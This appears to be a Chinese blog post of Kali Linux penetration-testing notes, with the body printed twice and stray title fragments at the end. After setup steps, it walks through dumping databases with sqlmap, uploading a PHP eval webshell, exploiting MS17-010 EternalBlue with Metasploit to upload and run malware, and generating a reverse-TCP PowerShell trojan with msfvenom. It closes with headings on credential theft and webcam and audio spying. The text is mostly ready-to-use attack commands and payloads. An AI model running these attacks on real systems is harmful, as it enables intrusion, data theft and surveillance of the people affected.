一、环境准备与系统配置1.1 环境虚拟机平台VMware操作系统Kali Linux网络安全人员专用系统1.2 换源更换为国内镜像源提升下载速度sudo apt update编辑源列表文件sudo nano /etc/apt/sources.list将文件内容替换为国内镜像源如阿里云、清华源等例如deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib保存并退出。1.3 更新软件包sudo apt update sudo apt upgrade -y1.4 设置中文语言环境sudo dpkg-reconfigure locales在界面中勾选zh_CN.UTF-8空格选中Tab键切换到OK将zh_CN.UTF-8设置为默认语言1.5 重启生效sudo reboot二、SQL注入漏洞利用sqlmap2.1 概述sqlmap自动化SQL注入检测与利用工具支持多种数据库MySQL、Oracle等。2.2 基本命令流程步骤命令说明1sqlmap -u 目标URL检测目标URL是否存在SQL注入漏洞2sqlmap -u 目标URL --dbs获取所有数据库名称3sqlmap -u 目标URL -D 数据库名 --tables获取指定数据库中的所有表名4sqlmap -u 目标URL -D 数据库名 -T 表名 --dump获取指定表中的所有数据字段与记录示例sqlmap -u http://example.com/page?id1 --dbs sqlmap -u http://example.com/page?id1 -D users_db --tables sqlmap -u http://example.com/page?id1 -D users_db -T admin --dump三、任意文件上传漏洞利用3.1 漏洞原理网站未对上传文件进行严格验证攻击者可上传恶意脚本如WebShell。3.2 常用工具WebShell木马如一句话木马PHP/ASP/JSP等中国蚁剑一款开源的跨平台WebShell管理工具用于连接并控制目标服务器。3.3 基本利用步骤制作木马例如PHP一句话木马?php eval($_POST[pass]); ?上传木马通过文件上传功能将木马上传到目标服务器。连接木马使用中国蚁剑添加Shell地址如http://target.com/uploads/shell.php和连接密码如pass。提权获取Shell后通过系统漏洞或配置错误提升权限如从普通用户提至root/Administrator。四、永恒之蓝漏洞利用实例MS17-0104.1 背景漏洞编号MS17-010影响2017年WannaCry勒索软件利用该漏洞在全球爆发。靶机Windows 7/2008等未打补丁的系统。4.2 使用Metasploitmsf进行渗透启动msf控制台msfconsole搜索相关漏洞模块search ms17-010常用模块exploit/windows/smb/ms17_010_eternalblue使用模块use exploit/windows/smb/ms17_010_eternalblue查看配置选项options设置必要参数设置目标主机IPrhostsset rhosts 192.168.xxx.xxx设置本地监听IPlhost通常为攻击机IPset lhost 192.168.yyy.yyy可选设置payload如windows/x64/meterpreter/reverse_tcp执行攻击run获取Shell后的简单操作若获得Meterpreter会话可进入系统Shellshell在Windows目标上弹出消息框msg * 你好打开计算器测试命令执行calc上传病毒upload运行病毒execute -f五、部署木马5.1 使用 msfvenom 生成木马Powershell 类型木马示例反向 TCPmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.yyy.yyy LPORT4444 -f psh-reflection -o shell.ps15.2 接收木马、监听连接Metasploit Handlermsfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp options set lhost 192.168.yyy.yyy黑客IP set lport 4444端口 run目标执行木马后handler 会建立 Meterpreter 会话。5.3 MSF 工具功能总结一、MSF控制命令大全二、权限提权与凭证获取渗透核心三、文件系统操作文件管理核心四、网络操作内网渗透关键五、系统操作控制目标主机六、用户界面监控监控、控制目标桌面七、摄像头、音频隐私窃取
Kali Linux 渗透测试基础操作与漏洞利用笔记
发布时间:2026/5/25 12:26:47
一、环境准备与系统配置1.1 环境虚拟机平台VMware操作系统Kali Linux网络安全人员专用系统1.2 换源更换为国内镜像源提升下载速度sudo apt update编辑源列表文件sudo nano /etc/apt/sources.list将文件内容替换为国内镜像源如阿里云、清华源等例如deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib保存并退出。1.3 更新软件包sudo apt update sudo apt upgrade -y1.4 设置中文语言环境sudo dpkg-reconfigure locales在界面中勾选zh_CN.UTF-8空格选中Tab键切换到OK将zh_CN.UTF-8设置为默认语言1.5 重启生效sudo reboot二、SQL注入漏洞利用sqlmap2.1 概述sqlmap自动化SQL注入检测与利用工具支持多种数据库MySQL、Oracle等。2.2 基本命令流程步骤命令说明1sqlmap -u 目标URL检测目标URL是否存在SQL注入漏洞2sqlmap -u 目标URL --dbs获取所有数据库名称3sqlmap -u 目标URL -D 数据库名 --tables获取指定数据库中的所有表名4sqlmap -u 目标URL -D 数据库名 -T 表名 --dump获取指定表中的所有数据字段与记录示例sqlmap -u http://example.com/page?id1 --dbs sqlmap -u http://example.com/page?id1 -D users_db --tables sqlmap -u http://example.com/page?id1 -D users_db -T admin --dump三、任意文件上传漏洞利用3.1 漏洞原理网站未对上传文件进行严格验证攻击者可上传恶意脚本如WebShell。3.2 常用工具WebShell木马如一句话木马PHP/ASP/JSP等中国蚁剑一款开源的跨平台WebShell管理工具用于连接并控制目标服务器。3.3 基本利用步骤制作木马例如PHP一句话木马?php eval($_POST[pass]); ?上传木马通过文件上传功能将木马上传到目标服务器。连接木马使用中国蚁剑添加Shell地址如http://target.com/uploads/shell.php和连接密码如pass。提权获取Shell后通过系统漏洞或配置错误提升权限如从普通用户提至root/Administrator。四、永恒之蓝漏洞利用实例MS17-0104.1 背景漏洞编号MS17-010影响2017年WannaCry勒索软件利用该漏洞在全球爆发。靶机Windows 7/2008等未打补丁的系统。4.2 使用Metasploitmsf进行渗透启动msf控制台msfconsole搜索相关漏洞模块search ms17-010常用模块exploit/windows/smb/ms17_010_eternalblue使用模块use exploit/windows/smb/ms17_010_eternalblue查看配置选项options设置必要参数设置目标主机IPrhostsset rhosts 192.168.xxx.xxx设置本地监听IPlhost通常为攻击机IPset lhost 192.168.yyy.yyy可选设置payload如windows/x64/meterpreter/reverse_tcp执行攻击run获取Shell后的简单操作若获得Meterpreter会话可进入系统Shellshell在Windows目标上弹出消息框msg * 你好打开计算器测试命令执行calc上传病毒upload运行病毒execute -f五、部署木马5.1 使用 msfvenom 生成木马Powershell 类型木马示例反向 TCPmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.yyy.yyy LPORT4444 -f psh-reflection -o shell.ps15.2 接收木马、监听连接Metasploit Handlermsfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp options set lhost 192.168.yyy.yyy黑客IP set lport 4444端口 run目标执行木马后handler 会建立 Meterpreter 会话。5.3 MSF 工具功能总结一、MSF控制命令大全二、权限提权与凭证获取渗透核心三、文件系统操作文件管理核心四、网络操作内网渗透关键五、系统操作控制目标主机六、用户界面监控监控、控制目标桌面七、摄像头、音频隐私窃取
的5个‘坑’与避坑指南(Python版))
:测试如何提前在代码提交阶段发现 Bug?)
)
